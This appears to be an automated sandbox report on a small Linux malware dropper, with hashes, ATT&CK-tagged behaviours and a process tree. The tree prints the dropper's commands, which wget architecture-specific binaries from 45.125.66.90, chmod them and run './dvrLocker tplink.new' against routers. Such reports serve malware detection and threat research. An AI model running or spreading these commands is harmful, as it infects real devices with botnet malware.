Analysis
-
max time kernel
13s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
27/11/2024, 02:39
Static task
static1
Behavioral task
behavioral1
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Resource
debian9-mipsel-20240226-en
General
-
Target
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
-
Size
913B
-
MD5
c18ef2271ad912c7542293151373ffa0
-
SHA1
65fb65c17671657fc431173051fe794c6c63007d
-
SHA256
6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
-
SHA512
fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
1754  chmod
1673  chmod
1688  chmod
1693  chmod
1709  chmod
1734  chmod
1744  chmod
1749  chmod
1764  chmod
1769  chmod
1667  chmod
1678  chmod
1698  chmod
1704  chmod
1724  chmod
1714  chmod
1719  chmod
1739  chmod
1683  chmod
1729  chmod
1759  chmod
-
Executes dropped EXE 21 IoCs
ioc                 pid   Process
/tmp/lib/dvrLocker  1668  dvrLocker
/tmp/lib/dvrLocker  1674  dvrLocker
/tmp/lib/dvrLocker  1679  dvrLocker
/tmp/lib/dvrLocker  1684  dvrLocker
/tmp/lib/dvrLocker  1689  dvrLocker
/tmp/lib/dvrLocker  1694  dvrLocker
/tmp/lib/dvrLocker  1699  dvrLocker
/mnt/dvrLocker      1705  dvrLocker
/mnt/dvrLocker      1710  dvrLocker
/mnt/dvrLocker      1715  dvrLocker
/mnt/dvrLocker      1720  dvrLocker
/mnt/dvrLocker      1725  dvrLocker
/mnt/dvrLocker      1730  dvrLocker
/mnt/dvrLocker      1735  dvrLocker
/mnt/dvrLocker      1740  dvrLocker
/mnt/dvrLocker      1745  dvrLocker
/mnt/dvrLocker      1750  dvrLocker
/mnt/dvrLocker      1755  dvrLocker
/mnt/dvrLocker      1760  dvrLocker
/mnt/dvrLocker      1765  dvrLocker
/mnt/dvrLocker      1770  dvrLocker
-
description              ioc                Process
File opened for reading  /proc/filesystems  ls
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid   Process
1671  wget
1676  rm
1708  wget
1712  rm
1743  wget
1747  rm
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description                   ioc                 Process
File opened for modification  /tmp/lib/dvrLocker  6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Processes
-
/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown1⤵
- Writes file to tmp directory
PID:1480 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:1481
-
-
/bin/lsls -l /proc/10/exe2⤵PID:1483
-
-
/bin/lsls -l /proc/1012/exe2⤵PID:1484
-
-
/bin/lsls -l /proc/1017/exe2⤵PID:1485
-
-
/bin/lsls -l /proc/1041/exe2⤵PID:1486
-
-
/bin/lsls -l /proc/1047/exe2⤵PID:1487
-
-
/bin/lsls -l /proc/1061/exe2⤵PID:1488
-
-
/bin/lsls -l /proc/1065/exe2⤵
- Reads runtime system information
PID:1489
-
-
/bin/lsls -l /proc/1067/exe2⤵PID:1490
-
-
/bin/lsls -l /proc/1070/exe2⤵PID:1491
-
-
/bin/lsls -l /proc/1077/exe2⤵
- Reads runtime system information
PID:1492
-
-
/bin/lsls -l /proc/108/exe2⤵PID:1494
-
-
/bin/lsls -l /proc/1084/exe2⤵PID:1497
-
-
/bin/lsls -l /proc/1088/exe2⤵PID:1498
-
-
/bin/lsls -l /proc/1097/exe2⤵PID:1499
-
-
/bin/lsls -l /proc/11/exe2⤵PID:1500
-
-
/bin/lsls -l /proc/1112/exe2⤵
- Reads runtime system information
PID:1501
-
-
/bin/lsls -l /proc/1113/exe2⤵PID:1502
-
-
/bin/lsls -l /proc/1121/exe2⤵PID:1503
-
-
/bin/lsls -l /proc/1125/exe2⤵
- Reads runtime system information
PID:1504
-
-
/bin/lsls -l /proc/1129/exe2⤵
- Reads runtime system information
PID:1505
-
-
/bin/lsls -l /proc/1134/exe2⤵
- Reads runtime system information
PID:1506
-
-
/bin/lsls -l /proc/1138/exe2⤵PID:1507
-
-
/bin/lsls -l /proc/1143/exe2⤵PID:1508
-
-
/bin/lsls -l /proc/1146/exe2⤵PID:1509
-
-
/bin/lsls -l /proc/1148/exe2⤵PID:1510
-
-
/bin/lsls -l /proc/1151/exe2⤵
- Reads runtime system information
PID:1511
-
-
/bin/lsls -l /proc/1152/exe2⤵
- Reads runtime system information
PID:1512
-
-
/bin/lsls -l /proc/1154/exe2⤵PID:1513
-
-
/bin/lsls -l /proc/116/exe2⤵
- Reads runtime system information
PID:1514
-
-
/bin/lsls -l /proc/1162/exe2⤵
- Reads runtime system information
PID:1515
-
-
/bin/lsls -l /proc/1165/exe2⤵PID:1516
-
-
/bin/lsls -l /proc/1166/exe2⤵PID:1517
-
-
/bin/lsls -l /proc/1168/exe2⤵PID:1518
-
-
/bin/lsls -l /proc/1173/exe2⤵PID:1519
-
-
/bin/lsls -l /proc/1178/exe2⤵PID:1520
-
-
/bin/lsls -l /proc/1182/exe2⤵PID:1521
-
-
/bin/lsls -l /proc/1184/exe2⤵
- Reads runtime system information
PID:1522
-
-
/bin/lsls -l /proc/1186/exe2⤵PID:1523
-
-
/bin/lsls -l /proc/1188/exe2⤵
- Reads runtime system information
PID:1524
-
-
/bin/lsls -l /proc/1191/exe2⤵PID:1525
-
-
/bin/lsls -l /proc/1194/exe2⤵
- Reads runtime system information
PID:1526
-
-
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:1527
-
-
/bin/lsls -l /proc/1229/exe2⤵PID:1528
-
-
/bin/lsls -l /proc/1239/exe2⤵PID:1529
-
-
/bin/lsls -l /proc/1250/exe2⤵PID:1530
-
-
/bin/lsls -l /proc/1252/exe2⤵PID:1531
-
-
/bin/lsls -l /proc/1266/exe2⤵
- Reads runtime system information
PID:1532
-
-
/bin/lsls -l /proc/1285/exe2⤵PID:1533
-
-
/bin/lsls -l /proc/1286/exe2⤵
- Reads runtime system information
PID:1534
-
-
/bin/lsls -l /proc/1293/exe2⤵
- Reads runtime system information
PID:1535
-
-
/bin/lsls -l /proc/13/exe2⤵PID:1536
-
-
/bin/lsls -l /proc/130/exe2⤵
- Reads runtime system information
PID:1538
-
-
/bin/lsls -l /proc/1303/exe2⤵
- Reads runtime system information
PID:1540
-
-
/bin/lsls -l /proc/1308/exe2⤵
- Reads runtime system information
PID:1542
-
-
/bin/lsls -l /proc/1319/exe2⤵PID:1543
-
-
/bin/lsls -l /proc/1331/exe2⤵PID:1544
-
-
/bin/lsls -l /proc/1341/exe2⤵PID:1545
-
-
/bin/lsls -l /proc/1348/exe2⤵PID:1546
-
-
/bin/lsls -l /proc/1370/exe2⤵
- Reads runtime system information
PID:1547
-
-
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:1548
-
-
/bin/lsls -l /proc/1469/exe2⤵PID:1549
-
-
/bin/lsls -l /proc/1475/exe2⤵PID:1550
-
-
/bin/lsls -l /proc/1476/exe2⤵PID:1551
-
-
/bin/lsls -l /proc/1477/exe2⤵
- Reads runtime system information
PID:1552
-
-
/bin/lsls -l /proc/1478/exe2⤵PID:1553
-
-
/bin/lsls -l /proc/1480/exe2⤵PID:1554
-
-
/bin/lsls -l /proc/15/exe2⤵PID:1555
-
-
/bin/lsls -l /proc/16/exe2⤵PID:1556
-
-
/bin/lsls -l /proc/163/exe2⤵
- Reads runtime system information
PID:1557
-
-
/bin/lsls -l /proc/164/exe2⤵PID:1558
-
-
/bin/lsls -l /proc/165/exe2⤵PID:1559
-
-
/bin/lsls -l /proc/166/exe2⤵PID:1560
-
-
/bin/lsls -l /proc/167/exe2⤵PID:1561
-
-
/bin/lsls -l /proc/168/exe2⤵PID:1562
-
-
/bin/lsls -l /proc/169/exe2⤵PID:1563
-
-
/bin/lsls -l /proc/17/exe2⤵PID:1564
-
-
/bin/lsls -l /proc/170/exe2⤵PID:1565
-
-
/bin/lsls -l /proc/171/exe2⤵PID:1566
-
-
/bin/lsls -l /proc/172/exe2⤵PID:1567
-
-
/bin/lsls -l /proc/173/exe2⤵
- Reads runtime system information
PID:1568
-
-
/bin/lsls -l /proc/174/exe2⤵PID:1571
-
-
/bin/lsls -l /proc/175/exe2⤵PID:1572
-
-
/bin/lsls -l /proc/176/exe2⤵PID:1574
-
-
/bin/lsls -l /proc/177/exe2⤵PID:1575
-
-
/bin/lsls -l /proc/178/exe2⤵
- Reads runtime system information
PID:1578
-
-
/bin/lsls -l /proc/179/exe2⤵
- Reads runtime system information
PID:1580
-
-
/bin/lsls -l /proc/18/exe2⤵PID:1581
-
-
/bin/lsls -l /proc/181/exe2⤵
- Reads runtime system information
PID:1582
-
-
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:1583
-
-
/bin/lsls -l /proc/2/exe2⤵PID:1584
-
-
/bin/lsls -l /proc/20/exe2⤵PID:1585
-
-
/bin/lsls -l /proc/206/exe2⤵
- Reads runtime system information
PID:1586
-
-
/bin/lsls -l /proc/207/exe2⤵PID:1587
-
-
/bin/lsls -l /proc/21/exe2⤵
- Reads runtime system information
PID:1588
-
-
/bin/lsls -l /proc/22/exe2⤵
- Reads runtime system information
PID:1589
-
-
/bin/lsls -l /proc/23/exe2⤵PID:1590
-
-
/bin/lsls -l /proc/24/exe2⤵PID:1591
-
-
/bin/lsls -l /proc/25/exe2⤵PID:1592
-
-
/bin/lsls -l /proc/255/exe2⤵PID:1593
-
-
/bin/lsls -l /proc/26/exe2⤵
- Reads runtime system information
PID:1594
-
-
/bin/lsls -l /proc/27/exe2⤵PID:1595
-
-
/bin/lsls -l /proc/276/exe2⤵PID:1596
-
-
/bin/lsls -l /proc/28/exe2⤵PID:1597
-
-
/bin/lsls -l /proc/29/exe2⤵PID:1598
-
-
/bin/lsls -l /proc/3/exe2⤵PID:1599
-
-
/bin/lsls -l /proc/30/exe2⤵PID:1600
-
-
/bin/lsls -l /proc/31/exe2⤵
- Reads runtime system information
PID:1601
-
-
/bin/lsls -l /proc/32/exe2⤵PID:1602
-
-
/bin/lsls -l /proc/334/exe2⤵
- Reads runtime system information
PID:1603
-
-
/bin/lsls -l /proc/336/exe2⤵
- Reads runtime system information
PID:1604
-
-
/bin/lsls -l /proc/34/exe2⤵PID:1605
-
-
/bin/lsls -l /proc/35/exe2⤵PID:1606
-
-
/bin/lsls -l /proc/36/exe2⤵PID:1607
-
-
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:1608
-
-
/bin/lsls -l /proc/415/exe2⤵PID:1609
-
-
/bin/lsls -l /proc/421/exe2⤵
- Reads runtime system information
PID:1610
-
-
/bin/lsls -l /proc/425/exe2⤵
- Reads runtime system information
PID:1611
-
-
/bin/lsls -l /proc/433/exe2⤵
- Reads runtime system information
PID:1612
-
-
/bin/lsls -l /proc/439/exe2⤵
- Reads runtime system information
PID:1613
-
-
/bin/lsls -l /proc/440/exe2⤵
- Reads runtime system information
PID:1614
-
-
/bin/lsls -l /proc/441/exe2⤵PID:1615
-
-
/bin/lsls -l /proc/444/exe2⤵
- Reads runtime system information
PID:1616
-
-
/bin/lsls -l /proc/451/exe2⤵
- Reads runtime system information
PID:1617
-
-
/bin/lsls -l /proc/457/exe2⤵PID:1618
-
-
/bin/lsls -l /proc/462/exe2⤵
- Reads runtime system information
PID:1619
-
-
/bin/lsls -l /proc/464/exe2⤵
- Reads runtime system information
PID:1620
-
-
/bin/lsls -l /proc/465/exe2⤵PID:1621
-
-
/bin/lsls -l /proc/466/exe2⤵PID:1622
-
-
/bin/lsls -l /proc/468/exe2⤵
- Reads runtime system information
PID:1623
-
-
/bin/lsls -l /proc/485/exe2⤵PID:1624
-
-
/bin/lsls -l /proc/5/exe2⤵PID:1625
-
-
/bin/lsls -l /proc/515/exe2⤵
- Reads runtime system information
PID:1626
-
-
/bin/lsls -l /proc/518/exe2⤵
- Reads runtime system information
PID:1627
-
-
/bin/lsls -l /proc/524/exe2⤵
- Reads runtime system information
PID:1628
-
-
/bin/lsls -l /proc/532/exe2⤵PID:1629
-
-
/bin/lsls -l /proc/544/exe2⤵PID:1630
-
-
/bin/lsls -l /proc/568/exe2⤵
- Reads runtime system information
PID:1631
-
-
/bin/lsls -l /proc/595/exe2⤵
- Reads runtime system information
PID:1632
-
-
/bin/lsls -l /proc/596/exe2⤵PID:1633
-
-
/bin/lsls -l /proc/6/exe2⤵PID:1634
-
-
/bin/lsls -l /proc/632/exe2⤵
- Reads runtime system information
PID:1635
-
-
/bin/lsls -l /proc/650/exe2⤵PID:1636
-
-
/bin/lsls -l /proc/652/exe2⤵PID:1637
-
-
/bin/lsls -l /proc/662/exe2⤵PID:1638
-
-
/bin/lsls -l /proc/665/exe2⤵PID:1639
-
-
/bin/lsls -l /proc/670/exe2⤵
- Reads runtime system information
PID:1640
-
-
/bin/lsls -l /proc/7/exe2⤵PID:1641
-
-
/bin/lsls -l /proc/708/exe2⤵
- Reads runtime system information
PID:1642
-
-
/bin/lsls -l /proc/712/exe2⤵
- Reads runtime system information
PID:1643
-
-
/bin/lsls -l /proc/716/exe2⤵
- Reads runtime system information
PID:1644
-
-
/bin/lsls -l /proc/78/exe2⤵PID:1645
-
-
/bin/lsls -l /proc/79/exe2⤵
- Reads runtime system information
PID:1646
-
-
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:1647
-
-
/bin/lsls -l /proc/80/exe2⤵
- Reads runtime system information
PID:1648
-
-
/bin/lsls -l /proc/81/exe2⤵
- Reads runtime system information
PID:1649
-
-
/bin/lsls -l /proc/82/exe2⤵PID:1650
-
-
/bin/lsls -l /proc/83/exe2⤵PID:1651
-
-
/bin/lsls -l /proc/84/exe2⤵PID:1652
-
-
/bin/lsls -l /proc/85/exe2⤵PID:1653
-
-
/bin/lsls -l /proc/867/exe2⤵
- Reads runtime system information
PID:1654
-
-
/bin/lsls -l /proc/89/exe2⤵PID:1655
-
-
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:1656
-
-
/bin/lsls -l /proc/917/exe2⤵PID:1657
-
-
/bin/lsls -l /proc/934/exe2⤵PID:1658
-
-
/bin/lsls -l /proc/949/exe2⤵PID:1659
-
-
/bin/lsls -l /proc/962/exe2⤵PID:1660
-
-
/bin/lsls -l /proc/968/exe2⤵PID:1661
-
-
/bin/lsls -l /proc/98/exe2⤵PID:1662
-
-
/bin/rmrm -rf /tmp/lib/2⤵PID:1663
-
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:1664
-
-
/bin/mkdirmkdir /tmp/lib/2⤵PID:1665
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:1666
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1667
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1668
-
-
/bin/rmrm -rf mpsl2⤵PID:1670
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:1671
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1673
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1674
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1676
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:1677
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1679
-
-
/bin/rmrm -rf arm2⤵PID:1681
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:1682
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1683
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1684
-
-
/bin/rmrm -rf arm52⤵PID:1686
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:1687
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1688
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1689
-
-
/bin/rmrm -rf ppc2⤵PID:1691
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:1692
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1693
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1694
-
-
/bin/rmrm -rf arm72⤵PID:1696
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:1697
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1698
-
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1699
-
-
/bin/rmrm -rf arm62⤵PID:1701
-
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:1702
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:1703
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1704
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1705
-
-
/bin/rmrm -rf mpsl2⤵PID:1707
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:1708
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1709
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1710
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1712
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:1713
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1715
-
-
/bin/rmrm -rf arm2⤵PID:1717
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:1718
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1719
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1720
-
-
/bin/rmrm -rf arm52⤵PID:1722
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:1723
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1724
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1725
-
-
/bin/rmrm -rf ppc2⤵PID:1727
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:1728
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1729
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1730
-
-
/bin/rmrm -rf arm72⤵PID:1732
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:1733
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1734
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1735
-
-
/bin/rmrm -rf arm62⤵PID:1737
-
-
/usr/bin/wgetwget http://45.125.66.90/mpsl -O -2⤵PID:1738
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1739
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1740
-
-
/bin/rmrm -rf mpsl2⤵PID:1742
-
-
/usr/bin/wgetwget http://45.125.66.90/mips -O -2⤵
- System Network Configuration Discovery
PID:1743
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1744
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1745
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:1747
-
-
/usr/bin/wgetwget http://45.125.66.90/arm -O -2⤵PID:1748
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1749
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1750
-
-
/bin/rmrm -rf arm2⤵PID:1752
-
-
/usr/bin/wgetwget http://45.125.66.90/arm5 -O -2⤵PID:1753
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1754
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1755
-
-
/bin/rmrm -rf arm52⤵PID:1757
-
-
/usr/bin/wgetwget http://45.125.66.90/ppc -O -2⤵PID:1758
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1759
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1760
-
-
/bin/rmrm -rf ppc2⤵PID:1762
-
-
/usr/bin/wgetwget http://45.125.66.90/arm7 -O -2⤵PID:1763
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1764
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1765
-
-
/bin/rmrm -rf arm72⤵PID:1767
-
-
/usr/bin/wgetwget http://45.125.66.90/arm6 -O -2⤵PID:1768
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:1769
-
-
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:1770
-
-
/bin/rmrm -rf arm62⤵PID:1772
-
Network
MITRE ATT&CK Enterprise v15
Downloads